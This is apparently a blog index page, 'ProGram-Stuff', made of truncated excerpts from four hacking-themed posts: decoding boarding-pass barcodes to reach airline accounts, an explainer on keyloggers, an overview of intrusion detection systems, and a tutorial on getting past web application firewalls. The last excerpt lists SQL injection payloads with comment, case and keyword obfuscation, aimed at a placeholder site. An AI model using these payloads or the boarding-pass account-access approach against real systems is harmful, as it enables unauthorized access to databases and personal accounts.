ProGram-Stuff

Millions of travelers pass through airports each day without understanding how powerful and insecure a boarding pass can be. Anyone can scan the boarding pass barcode with a mobile app, allowing access to frequent-flyer accounts and even a passenger's temporary airline account. In this guide, we will explore how hackers scan and decode the information contained in a boarding pass barcode and why. The average airline boarding pass contains a wealth of information that a hacker could potentially take advantage of in two primary ways. How they take advantage of it mostly depends on whether the target has a frequent-flyer account or not. Airlines have two types of accounts. One is temporary and is created when you buy a ticket that isn't affiliated with an airline miles program, such as when you use Google Flights or Expedia. The other type is a permanent account, which often comes in the form of a frequent-flyer program. You might think that just not having a frequent-flye

Keylogger  is a software program or hardware device that is used to monitor and log each of the keys a user types into a computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user. Because these programs and hardware devices monitor the keys typed in a user can easily find user passwords and other information a user may not wish others to know about. Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted to an unknown third party. About keyloggers key loggersA keylogger is a program that runs in the background, recording all the keystrokes. Once keystrokes are logged, they are hidden in the machine for later retrieval, or shipped raw to the attacker. The attacker then peruses them carefully in the hopes of either finding passwords, or possibly o

>>Intrusion Detection System (IDS): A system that tries to identify attempts to hack or break into a computer system or to misuse it. IDSs may monitor packets passing over the network, monitor system files, monitor log files, or set up deception systems that attempt to trap hackers. Computer systems have become more vulnerable to intrusions than ever. Intrusion Detection is a security technology that allows not only the detection of attacks, but also attempts to provide notification of new attacks unforeseen by other components. Intrusion detection is an important component of a security system, and it complements other security technologies. >>How does an IDS work? While there are several types of IDSs, the most common types work the same. They analyze network traffic and log files for certain patterns. What kind of patterns you may ask? While a firewall will continually block a hacker from connecting to a network, most firewalls never alert an administrator. T

Web application firewalls are designed to protect web applications from known attacks, such as SQL injection attacks, that are commonly used to compromise websites. They do this by intercepting requests sent by clients and enforcing strict rules about their formatting and payload. Today we demonstrate some tricks to bypass Web application firewall (WAF). Sqli http://xyz.com/detail.php?id=44 union all select 1,2,3,4,5— – By passed Sqli http://xyz.com/detailphp?id=44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5— – By Function Capitalization:- Some Web Application Firewalls will filter only lowercase alphabets, So we can easily bypass by case changing. Actual query http://xyz.com/detail.php?id=44 UNION SELECT 1,2,3,4,5— Query to bypass the WAF http://xyz.com/detail.php?id=-1 uniOn SeLeCt 1,2,3,4,5— By Replaced Keywords:- Some WAF’s will escape certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within a